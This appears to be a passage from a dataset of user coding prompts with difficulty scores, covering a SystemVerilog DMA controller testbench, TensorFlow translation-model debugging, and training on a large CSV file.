else if (psel_i & !penable_i & !pwrite_i) begin // in the setup cycle in the APB state diagram
case (paddr_i)
'h0: rdata <= 32'h0001_2024;
'h100: rdata <= src_addr;
'h104: rdata <= dst_addr;
'h108: rdata <= {16'd0, byte_len};
'h110: rdata <= {31'd0, done_i};
default: rdata <= 32'd0;
endcase
end
end
// output assignments
assign pready_o = 1'b1;
assign prdata_o = rdata;
assign pslverr_o = 1'b0;
assign src_addr_o = src_addr;
assign dst_addr_o = dst_addr;
assign byte_len_o = byte_len;
assign start_o = start;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_CFG.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_TOP.sv>>>
module DMAC_TOP
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (W channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
wire [31:0] src_addr;
wire [31:0] dst_addr;
wire [15:0] byte_len;
wire start;
wire done;
DMAC_CFG u_cfg(
.clk (clk),
.rst_n (rst_n),
// AMBA APB interface
.psel_i (psel_i),
.penable_i (penable_i),
.paddr_i (paddr_i),
.pwrite_i (pwrite_i),
.pwdata_i (pwdata_i),
.pready_o (pready_o),
.prdata_o (prdata_o),
.pslverr_o (pslverr_o),
.src_addr_o (src_addr),
.dst_addr_o (dst_addr),
.byte_len_o (byte_len),
.start_o (start),
.done_i (done)
);
DMAC_ENGINE u_engine(
.clk (clk),
.rst_n (rst_n),
// configuration registers
.src_addr_i (src_addr),
.dst_addr_i (dst_addr),
.byte_len_i (byte_len),
.start_i (start),
.done_o (done),
// AMBA AXI interface (AW channel)
.awid_o (awid_o),
.awaddr_o (awaddr_o),
.awlen_o (awlen_o),
.awsize_o (awsize_o),
.awburst_o (awburst_o),
.awvalid_o (awvalid_o),
.awready_i (awready_i),
// AMBA AXI interface (W channel)
.wid_o (wid_o),
.wdata_o (wdata_o),
.wstrb_o (wstrb_o),
.wlast_o (wlast_o),
.wvalid_o (wvalid_o),
.wready_i (wready_i),
// AMBA AXI interface (B channel)
.bid_i (bid_i),
.bresp_i (bresp_i),
.bvalid_i (bvalid_i),
.bready_o (bready_o),
// AMBA AXI interface (AR channel)
.arid_o (arid_o),
.araddr_o (araddr_o),
.arlen_o (arlen_o),
.arsize_o (arsize_o),
.arburst_o (arburst_o),
.arvalid_o (arvalid_o),
.arready_i (arready_i),
// AMBA AXI interface (R channel)
.rid_i (rid_i),
.rdata_i (rdata_i),
.rresp_i (rresp_i),
.rlast_i (rlast_i),
.rvalid_i (rvalid_i),
.rready_o (rready_o)
);
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_TOP.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
interface AXI_AW_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic awvalid;
logic awready;
logic [ID_WIDTH-1:0] awid;
logic [ADDR_WIDTH-1:0] awaddr;
logic [3:0] awlen;
logic [2:0] awsize;
logic [1:0] awburst;
endinterface
interface AXI_W_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic wvalid;
logic wready;
logic [ID_WIDTH-1:0] wid;
logic [DATA_WIDTH-1:0] wdata;
logic [DATA_WIDTH/8-1:0] wstrb;
logic wlast;
endinterface
interface AXI_B_CH
#(
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic bvalid;
logic bready;
logic [ID_WIDTH-1:0] bid;
logic [1:0] bresp;
endinterface
interface AXI_AR_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic arvalid;
logic arready;
logic [ID_WIDTH-1:0] arid;
logic [ADDR_WIDTH-1:0] araddr;
logic [3:0] arlen;
logic [2:0] arsize;
logic [1:0] arburst;
endinterface
interface AXI_R_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic rvalid;
logic rready;
logic [ID_WIDTH-1:0] rid;
logic [DATA_WIDTH-1:0] rdata;
logic [1:0] rresp;
logic rlast;
endinterface
interface APB (
input clk
);
logic psel;
logic penable;
logic [31:0] paddr;
logic pwrite;
logic [31:0] pwdata;
logic pready;
logic [31:0] prdata;
logic pslverr;
modport master (
input clk,
input pready, prdata, pslverr,
output psel, penable, paddr, pwrite, pwdata
);
task init();
psel = 1'b0;
penable = 1'b0;
paddr = 32'd0;
pwrite = 1'b0;
pwdata = 32'd0;
endtask
task write(input int addr,
input int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b1;
pwdata = data;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
task read(input int addr,
output int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b0;
pwdata = 'hX;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
data = prdata;
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
endinterface
<<<EndOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
module AXI_SLAVE
#(
parameter ADDR_WIDTH = 16,
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH,
parameter AWREADY_DELAY = 1,
parameter ARREADY_DELAY = 1,
parameter AR2R_DELAY = 50
)
(
input wire clk,
input wire rst_n, // _n means active low
AXI_AW_CH aw_ch,
AXI_W_CH w_ch,
AXI_B_CH b_ch,
AXI_AR_CH ar_ch,
AXI_R_CH r_ch
);
localparam DATA_DEPTH = 1<<ADDR_WIDTH;
logic [7:0] mem[DATA_DEPTH];
function void write_byte(int addr, input bit [7:0] wdata);
mem[addr] = wdata;
endfunction
function void write_word(int addr, input bit [31:0] wdata);
for (int i=0; i<4; i++) begin
write_byte(addr+i, wdata[8*i +: 8]); // [i*8+7:i*8]
end
endfunction
function bit [7:0] read_byte(int addr);
read_byte = mem[addr];
endfunction
function bit [31:0] read_word(int addr);
for (int i=0; i<4; i++) begin
read_word[8*i +: 8] = read_byte(addr+i);// [i*8+7:i*8]
end
endfunction
//----------------------------------------------------------
// write channels (AW, W, B)
//----------------------------------------------------------
localparam logic [1:0] S_W_IDLE = 0,
S_W_AWREADY = 1,
S_W_BURST = 2,
S_W_RESP = 3;
logic [1:0] wstate, wstate_n;
logic [7:0] wcnt, wcnt_n;
logic [ADDR_WIDTH-1:0] waddr, waddr_n;
logic [ID_WIDTH-1:0] wid, wid_n;
logic [3:0] wlen, wlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
wstate <= S_W_IDLE;
wcnt <= 8'd0;
waddr <= {ADDR_WIDTH{1'b0}};
wid <= {ID_WIDTH{1'b0}};
wlen <= 4'd0;
end
else begin
wstate <= wstate_n;
wcnt <= wcnt_n;
waddr <= waddr_n;
wid <= wid_n;
wlen <= wlen_n;
end
always @(*) begin
wstate_n = wstate;
wcnt_n = wcnt;
waddr_n = waddr;
wid_n = wid;
wlen_n = wlen;
aw_ch.awready = 1'b0;
w_ch.wready = 1'b0;
b_ch.bvalid = 1'b0;
case (wstate)
S_W_IDLE: begin
if (aw_ch.awvalid) begin
if (AWREADY_DELAY == 0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = AWREADY_DELAY-1;
wstate_n = S_W_AWREADY;
end
end
end
S_W_AWREADY: begin
if (wcnt==0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = wcnt - 8'd1;
end
end
S_W_BURST: begin
w_ch.wready = 1'b1;
if (w_ch.wvalid) begin
for (int i=0; i<DATA_WIDTH/8; i++) begin
write_byte(waddr + i, w_ch.wdata[i*8 +: 8]); // [i*8+7:i*8]
end
waddr_n = waddr + (DATA_WIDTH/8);
if (wlen==4'd0) begin
wstate_n = S_W_RESP;
end
else begin
wlen_n = wlen - 4'd1;
end
end
end
S_W_RESP: begin
b_ch.bvalid = 1'b1;
if (b_ch.bready) begin
wstate_n = S_W_IDLE;
end
end
endcase
end
//----------------------------------------------------------
// read channel (AR, R)
//----------------------------------------------------------
localparam logic [1:0] S_R_IDLE = 0,
S_R_ARREADY = 1,
S_R_DELAY = 2,
S_R_BURST = 3;
logic [1:0] rstate, rstate_n;
logic [7:0] rcnt, rcnt_n;
logic [ADDR_WIDTH-1:0] raddr, raddr_n;
logic [ID_WIDTH-1:0] rid, rid_n;
logic [3:0] rlen, rlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
rstate <= S_R_IDLE;
rcnt <= 8'd0;
raddr <= {ADDR_WIDTH{1'b0}};
rid <= {ID_WIDTH{1'b0}};
rlen <= 4'd0;
end
else begin
rstate <= rstate_n;
rcnt <= rcnt_n;
raddr <= raddr_n;
rid <= rid_n;
rlen <= rlen_n;
end
always_comb begin
rstate_n = rstate;
rcnt_n = rcnt;
raddr_n = raddr;
rid_n = rid;
rlen_n = rlen;
ar_ch.arready = 1'b0;
r_ch.rvalid = 1'b0;
r_ch.rlast = 1'b0;
case (rstate)
S_R_IDLE: begin
if (ar_ch.arvalid) begin
if (ARREADY_DELAY == 0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = ARREADY_DELAY-1;
rstate_n = S_R_ARREADY;
end
end
end
S_R_ARREADY: begin
if (rcnt==0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_DELAY: begin
if (rcnt==0) begin
rstate_n = S_R_BURST;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_BURST: begin
r_ch.rvalid = 1'b1;
r_ch.rlast = (rlen==4'd0);
for (int i=0; i<DATA_WIDTH/8; i++) begin
r_ch.rdata[i*8 +: 8] = read_byte(raddr + i); // [i*8+7:i*8]
end
if (r_ch.rready) begin
raddr_n = raddr + (DATA_WIDTH/8);
if (rlen==4'd0) begin
rstate_n = S_R_IDLE;
end
else begin
rlen_n = rlen - 4'd1;
end
end
end
endcase
end
// output assignments
assign b_ch.bid = wid;
assign b_ch.bresp = 2'd0;
assign r_ch.rid = rid;
assign r_ch.rresp = 2'd0;
endmodule
<<<EndOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
`ifndef __AXI_TYPEDEF_SVH__
`define __AXI_TYPEDEF_SVH__
`define AXI_ADDR_WIDTH 32
`define AXI_DATA_WIDTH 32
`define AXI_ID_WIDTH 4
`endif /* __AXI_TYPEDEF_SVH__ */
<<<EndOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
|
6a6f7e45e97dcf3b4af40b330b95463c
|
{
"intermediate": 0.3662366569042206,
"beginner": 0.39106234908103943,
"expert": 0.24270100891590118
}
|
46,769
|
%%time
!pip install -q -U tensorflow-text
!pip install datasets
!pip install -q tensorflow_datasets
!pip install pydot
!cd /content
!clear
import tensorflow as tf
import tensorflow_text as tf_text
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import requests
import functools
import collections
import os
import pathlib
import re
import shutil
import string
import tempfile
import time
from tensorflow.keras import layers
from tensorflow.keras import losses
import pydot
from datasets import load_dataset
dataset = load_dataset("Helsinki-NLP/opus_books", "en-fr")
data = dataset["train"]
french_sentences = [example["fr"] for example in data["translation"][:127085]]
english_sentences = [example["en"] for example in data["translation"][:127085]]
dataset = tf.data.Dataset.from_tensor_slices((french_sentences, english_sentences))
french_sentences_decoded = []
english_sentences_decoded = []
for french_sentence, english_sentence in dataset.take(127085):
french_sentences_decoded.append(french_sentence.numpy().decode('utf-8'))
english_sentences_decoded.append(english_sentence.numpy().decode('utf-8'))
print("Number of French sentences:", len(french_sentences_decoded))
print("Number of English sentences:", len(english_sentences_decoded))
train_fr = french_sentences
train_en = english_sentences
from tensorflow_text.tools.wordpiece_vocab import bert_vocab_from_dataset as bert_vocab
bert_tokenizer_params = dict(lower_case=True)
reserved_tokens = ["[PAD]", "[UNK]", "[START]", "[END]"]
bert_vocab_args = {
'vocab_size': 8000,
'reserved_tokens': reserved_tokens,
'bert_tokenizer_params': bert_tokenizer_params,
'learn_params': {},
}
%%time
en_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(english_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
%%time
fr_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(french_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
def write_vocab_file(filepath, vocab):
with open(filepath, 'w') as f:
for token in vocab:
print(token, file=f)
write_vocab_file('en_vocab.txt', en_vocab)
write_vocab_file('fr_vocab.txt', fr_vocab)
# Tokenize the examples -> (batch, word, word-piece)
en_tokenizere = en_tokenizer.tokenize("hello how are you Vadim")
# Merge the word and word-piece axes -> (batch, tokens)
en_tokenizere= en_tokenizere.merge_dims(-2,-1)
for ex in en_tokenizere.to_list():
print(ex)
max_length = 200
fr_sequences = [fr_tokenizer.tokenize(french_sentence.numpy().decode('utf-8')).merge_dims(-2,-1)
for french_sentence, _ in dataset.take(1000)]
fr_ragged = tf.ragged.stack(fr_sequences)
fr_padded = fr_ragged.to_tensor(default_value=0, shape=[None, None, max_length])
en_sequences = [en_tokenizer.tokenize(english_sentence.numpy().decode('utf-8')).merge_dims(-2,-1)
for _, english_sentence in dataset.take(1000)]
en_ragged = tf.ragged.stack(en_sequences)
en_padded = en_ragged.to_tensor(default_value=0, shape=[None, None, max_length])
x_train = fr_padded
y_train = en_padded
import numpy as np
import tensorflow as tf
from tensorflow.keras import layers, models
def get_positional_encoding(seq_len, d_model):
positions = np.arange(seq_len)[:, np.newaxis]
div_term = np.exp(np.arange(0, d_model, 2) * -(np.log(10000.0) / d_model))
pe = np.zeros((seq_len, d_model))
pe[:, 0::2] = np.sin(positions * div_term)
pe[:, 1::2] = np.cos(positions * div_term)
return pe
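# Note: this sinusoidal table is defined but never used below; the model
# instead learns positions with the TokenAndPositionEmbedding layer.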
class TransformerBlock(layers.Layer):
def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
super(TransformerBlock, self).__init__()
self.att = layers.MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
self.ffn = tf.keras.Sequential(
[layers.Dense(ff_dim, activation="relu"), layers.Dense(embed_dim)]
)
self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)
self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)
self.dropout1 = layers.Dropout(rate)
self.dropout2 = layers.Dropout(rate)
def call(self, inputs, training=False):
attn_output = self.att(inputs, inputs)
attn_output = self.dropout1(attn_output, training=training)
out1 = self.layernorm1(inputs + attn_output)
ffn_output = self.ffn(out1)
ffn_output = self.dropout2(ffn_output, training=training)
return self.layernorm2(out1 + ffn_output)
class TokenAndPositionEmbedding(layers.Layer):
def __init__(self, maxlen, vocab_size, embed_dim):
super(TokenAndPositionEmbedding, self).__init__()
self.token_emb = layers.Embedding(input_dim=vocab_size, output_dim=embed_dim)
self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)
def call(self, x):
maxlen = tf.shape(x)[-1]
positions = tf.range(start=0, limit=maxlen, delta=1)
positions = self.pos_emb(positions)
x = self.token_emb(x)
return x + positions
# Model Construction
vocab_size = 20000 # Example vocabulary size
embed_dim = 200 # Embedding size for each token
num_heads = 8 # Number of attention heads
ff_dim = 2048 # Hidden layer size in feed forward network inside transformer
inputs = layers.Input(shape=(200,))
embedding_layer = TokenAndPositionEmbedding(200, vocab_size, embed_dim)
x = embedding_layer(inputs)
transformer_block = TransformerBlock(embed_dim, num_heads, ff_dim)
x = transformer_block(x, training=True) # Just as an example. In practice, training can be dynamically set.
x = layers.GlobalAveragePooling1D()(x)
outputs = layers.Dense(vocab_size, activation="softmax")(x)
model = models.Model(inputs=inputs, outputs=outputs)
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
model.summary()
history = model.fit(x_train, y_train, epochs=10, batch_size = 2)
This is my code in Google Colab, cell by cell. When I run the cell "history = model.fit(x_train, y_train, epochs=10, batch_size = 2)" I get the error message below; your goal is to fix the problem by proposing a change to the cells:
Epoch 1/10
---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
<ipython-input-225-dad0d896f5c0> in <cell line: 1>()
----> 1 history = model.fit(x_train, y_train, epochs=10, batch_size = 2)
1 frames
/usr/local/lib/python3.10/dist-packages/keras/src/utils/traceback_utils.py in error_handler(*args, **kwargs)
120 # To get the full stack trace, call:
121 # keras.config.disable_traceback_filtering()
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
/usr/local/lib/python3.10/dist-packages/keras/src/layers/input_spec.py in assert_input_compatibility(input_spec, inputs, layer_name)
243 if spec_dim is not None and dim is not None:
244 if spec_dim != dim:
--> 245 raise ValueError(
246 f'Input {input_index} of layer "{layer_name}" is '
247 "incompatible with the layer: "
ValueError: Input 0 of layer "functional_140" is incompatible with the layer: expected shape=(None, 200), found shape=(2, 1, 200)
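A minimal sketch of one likely fix, assuming x_train (and y_train) really carry the extra length-1 axis the error reports, i.e. shape (N, 1, 200): drop that axis with tf.squeeze before fitting.
import tensorflow as tf
# The model expects (batch, 200) but the data arrives as (batch, 1, 200),
# so remove the length-1 axis before calling fit().
x_train = tf.squeeze(x_train, axis=1)
y_train = tf.squeeze(y_train, axis=1)
history = model.fit(x_train, y_train, epochs=10, batch_size=2)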
|
2a672823bb92aaa2b3b0c94af1091751
|
{
"intermediate": 0.3316658139228821,
"beginner": 0.4265757203102112,
"expert": 0.24175843596458435
}
|
46,770
|
Hugging Face workspace that can take a text story and make a video from it
|
6f78f65aeb4541ccfdb8962912e9dc71
|
{
"intermediate": 0.32733479142189026,
"beginner": 0.18716956675052643,
"expert": 0.4854956269264221
}
|
46,771
|
I want to train a model on my dataset (a large CSV file, 27 GB) to predict two values for each row: Prior_1 and Prior_2.
Due to the size of my CSV file I can't read it into a DataFrame all at once.
Give me proper Python code to train a model on my dataset.
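A minimal sketch of one common approach, assuming the file has a header row and numeric columns (batch_stream is a hypothetical helper name): stream the CSV in chunks with pandas and yield (features, targets) batches.
import pandas as pd

def batch_stream(path, batch_size):
    # Read the 27 GB file in fixed-size chunks instead of loading it whole.
    for chunk in pd.read_csv(path, chunksize=batch_size):
        y = chunk[['Prior_1', 'Prior_2']].values
        X = chunk.drop(columns=['Prior_1', 'Prior_2']).values
        yield X, y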
|
4441969af470efff0af1e5e893dce548
|
{
"intermediate": 0.48868417739868164,
"beginner": 0.1387758105993271,
"expert": 0.3725399971008301
}
|
46,772
|
print("x_train shape:", x_train.shape)
print("y_train shape:", y_train.shape)
history = model.fit(x_train, y_train, epochs=10, batch_size=2)
x_train shape: (10000, 200)
y_train shape: (10000, 200)
Epoch 1/10
---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
<ipython-input-236-e93fc86f4a99> in <cell line: 4>()
2 print("y_train shape:", y_train.shape)
3
----> 4 history = model.fit(x_train, y_train, epochs=10, batch_size=2)
1 frames
/usr/local/lib/python3.10/dist-packages/keras/src/utils/traceback_utils.py in error_handler(*args, **kwargs)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
/usr/local/lib/python3.10/dist-packages/keras/src/backend/tensorflow/nn.py in sparse_categorical_crossentropy(target, output, from_logits, axis)
640 )
641 if len(target.shape) != len(output.shape[:-1]):
--> 642 raise ValueError(
643 "Argument `output` must have rank (ndim) `target.ndim - 1`. "
644 "Received: "
ValueError: Argument `output` must have rank (ndim) `target.ndim - 1`. Received: target.shape=(2, 200), output.shape=(2, 20000)
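A sketch of one likely fix, reusing the names from the model cells earlier in this conversation (inputs, embedding_layer, transformer_block, layers, models, vocab_size) and assuming the goal is one predicted token per position: keep the sequence axis instead of pooling it away, so the output shape (batch, 200, vocab_size) matches targets of shape (batch, 200) under sparse_categorical_crossentropy.
# Drop the GlobalAveragePooling1D layer and apply Dense per time step.
x = embedding_layer(inputs)                                   # (batch, 200, embed_dim)
x = transformer_block(x)                                      # (batch, 200, embed_dim)
outputs = layers.Dense(vocab_size, activation="softmax")(x)   # (batch, 200, vocab_size)
model = models.Model(inputs=inputs, outputs=outputs)
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy",
              metrics=["accuracy"])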
|
a14c6528f43183a089829aa2422e9620
|
{
"intermediate": 0.5270666480064392,
"beginner": 0.24094583094120026,
"expert": 0.23198749125003815
}
|
46,773
|
Hello, I am building a translation AI using TensorFlow. I have now tokenized the dataset with my code, and I work in Google Colab cell by cell. I cannot build a model optimized for AI translation; your goal is to build a translation model for TensorFlow on top of my current code. This is my current code:
%%time
!pip install -q -U tensorflow-text
!pip install datasets
!pip install -q tensorflow_datasets
!pip install pydot
!cd /content
!clear
import tensorflow as tf
import tensorflow_text as tf_text
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import requests
import functools
import collections
import os
import pathlib
import re
import string
import tempfile
import time
import shutil
from tensorflow.keras import layers
from tensorflow.keras import losses
import pydot
from datasets import load_dataset
dataset = load_dataset("Helsinki-NLP/opus_books", "en-fr")
data = dataset["train"]
french_sentences = [example["fr"] for example in data["translation"][:127085]]
english_sentences = [example["en"] for example in data["translation"][:127085]]
dataset = tf.data.Dataset.from_tensor_slices((french_sentences, english_sentences))
french_sentences_decoded = []
english_sentences_decoded = []
for french_sentence, english_sentence in dataset.take(127085):
french_sentences_decoded.append("b '"+french_sentence.numpy().decode('utf-8'))
english_sentences_decoded.append("b '"+english_sentence.numpy().decode('utf-8'))
print("Nombre de phrases en français :", len(french_sentences_decoded))
print("Nombre de phrases en anglais :", len(english_sentences_decoded))
train_fr = french_sentences
train_en = english_sentences
from tensorflow_text.tools.wordpiece_vocab import bert_vocab_from_dataset as bert_vocab
bert_tokenizer_params = dict(lower_case=True)
reserved_tokens = ["[PAD]", "[UNK]", "[START]", "[END]"]
bert_vocab_args = {
'vocab_size': 8000,
'reserved_tokens': reserved_tokens,
'bert_tokenizer_params': bert_tokenizer_params,
'learn_params': {},
}
%%time
en_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(english_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
%%time
fr_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(french_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
def write_vocab_file(filepath, vocab):
with open(filepath, 'w') as f:
for token in vocab:
print(token, file=f)
write_vocab_file('en_vocab.txt', en_vocab)
write_vocab_file('fr_vocab.txt', fr_vocab)
fr_tokenizer = tf_text.BertTokenizer('fr_vocab.txt', **bert_tokenizer_params)
en_tokenizer = tf_text.BertTokenizer('en_vocab.txt', **bert_tokenizer_params)
# Tokenize the examples -> (batch, word, word-piece)
en_tokenizere = en_tokenizer.tokenize("hello how are you Vadim")
# Merge the word and word-piece axes -> (batch, tokens)
en_tokenizere= en_tokenizere.merge_dims(-2,-1)
for ex in en_tokenizere.to_list():
print(ex)
|
47ba36c16b33b0838e18fcee7afb7f43
|
{
"intermediate": 0.3630707263946533,
"beginner": 0.3557378947734833,
"expert": 0.2811913788318634
}
|
46,774
|
I want to train a NN model on my dataset (a large CSV file, 27 GB) to predict two values for each row: Prior_1 and Prior_2.
Due to the size of my CSV file I can't read it into a DataFrame all at once.
Give me proper Python code to train a model on my dataset.
|
9f0534ec4f39bac8c62452e102d8a43a
|
{
"intermediate": 0.3014947175979614,
"beginner": 0.08235567063093185,
"expert": 0.6161496639251709
}
|
46,775
|
Hello, I am building a translation AI using TensorFlow. I have now tokenized the dataset with my code, and I work in Google Colab cell by cell. I cannot build a model optimized for AI translation; your goal is to build the model cell, with the Keras model build and model compile, for the best translation performance:
%%time
!pip install -q -U tensorflow-text
!pip install datasets
!pip install -q tensorflow_datasets
!pip install pydot
!cd /content
!clear
import tensorflow as tf
import tensorflow_text as tf_text
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import requests
import functools
import collections
import os
import pathlib
import re
import string
import tempfile
import time
import shutil
from tensorflow.keras import layers
from tensorflow.keras import losses
import pydot
from datasets import load_dataset
dataset = load_dataset("Helsinki-NLP/opus_books", "en-fr")
data = dataset["train"]
french_sentences = [example["fr"] for example in data["translation"][:127085]]
english_sentences = [example["en"] for example in data["translation"][:127085]]
dataset = tf.data.Dataset.from_tensor_slices((french_sentences, english_sentences))
french_sentences_decoded = []
english_sentences_decoded = []
for french_sentence, english_sentence in dataset.take(127085):
french_sentences_decoded.append("b '"+french_sentence.numpy().decode('utf-8'))
english_sentences_decoded.append("b '"+english_sentence.numpy().decode('utf-8'))
print("Nombre de phrases en français :", len(french_sentences_decoded))
print("Nombre de phrases en anglais :", len(english_sentences_decoded))
train_fr = french_sentences
train_en = english_sentences
from tensorflow_text.tools.wordpiece_vocab import bert_vocab_from_dataset as bert_vocab
bert_tokenizer_params = dict(lower_case=True)
reserved_tokens = ["[PAD]", "[UNK]", "[START]", "[END]"]
bert_vocab_args = {
'vocab_size': 8000,
'reserved_tokens': reserved_tokens,
'bert_tokenizer_params': bert_tokenizer_params,
'learn_params': {},
}
%%time
en_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(english_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
%%time
fr_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(french_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
def write_vocab_file(filepath, vocab):
with open(filepath, 'w') as f:
for token in vocab:
print(token, file=f)
write_vocab_file('en_vocab.txt', en_vocab)
write_vocab_file('fr_vocab.txt', fr_vocab)
fr_tokenizer = tf_text.BertTokenizer('fr_vocab.txt', **bert_tokenizer_params)
en_tokenizer = tf_text.BertTokenizer('en_vocab.txt', **bert_tokenizer_params)
# Tokenize the examples -> (batch, word, word-piece)
en_tokenizere = en_tokenizer.tokenize("hello how are you Vadim")
# Merge the word and word-piece axes -> (batch, tokens)
en_tokenizere= en_tokenizere.merge_dims(-2,-1)
for ex in en_tokenizere.to_list():
print(ex)
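A compact sketch of one possible model cell, assuming teacher forcing with (source IDs, right-shifted target IDs) as inputs and target IDs as labels; a small GRU encoder-decoder is shown, with vocabulary sizes taken from the vocab lists built above.
import tensorflow as tf
from tensorflow.keras import layers, Model

embed_dim, units = 256, 512
enc_in = layers.Input(shape=(None,), dtype=tf.int64)   # French token IDs
dec_in = layers.Input(shape=(None,), dtype=tf.int64)   # English token IDs, shifted right
enc_emb = layers.Embedding(len(fr_vocab), embed_dim)(enc_in)
_, enc_state = layers.GRU(units, return_state=True)(enc_emb)
dec_emb = layers.Embedding(len(en_vocab), embed_dim)(dec_in)
dec_seq = layers.GRU(units, return_sequences=True)(dec_emb, initial_state=enc_state)
logits = layers.Dense(len(en_vocab))(dec_seq)          # per-token vocabulary scores

model = Model([enc_in, dec_in], logits)
model.compile(optimizer="adam",
              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
              metrics=["accuracy"])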
|
7912e9241524ade784a0ef160cb70fa5
|
{
"intermediate": 0.3689960241317749,
"beginner": 0.3881682753562927,
"expert": 0.24283570051193237
}
|
46,776
|
{
"name": "NotImplementedError",
"message": "Iterating over a symbolic KerasTensor is not supported.",
"stack": "---------------------------------------------------------------------------
NotImplementedError Traceback (most recent call last)
Cell In[33], line 5
2 batch_size = 128
4 # Instantiate the model
----> 5 model = build_model()
7 model.summary()
Cell In[32], line 10, in build_model()
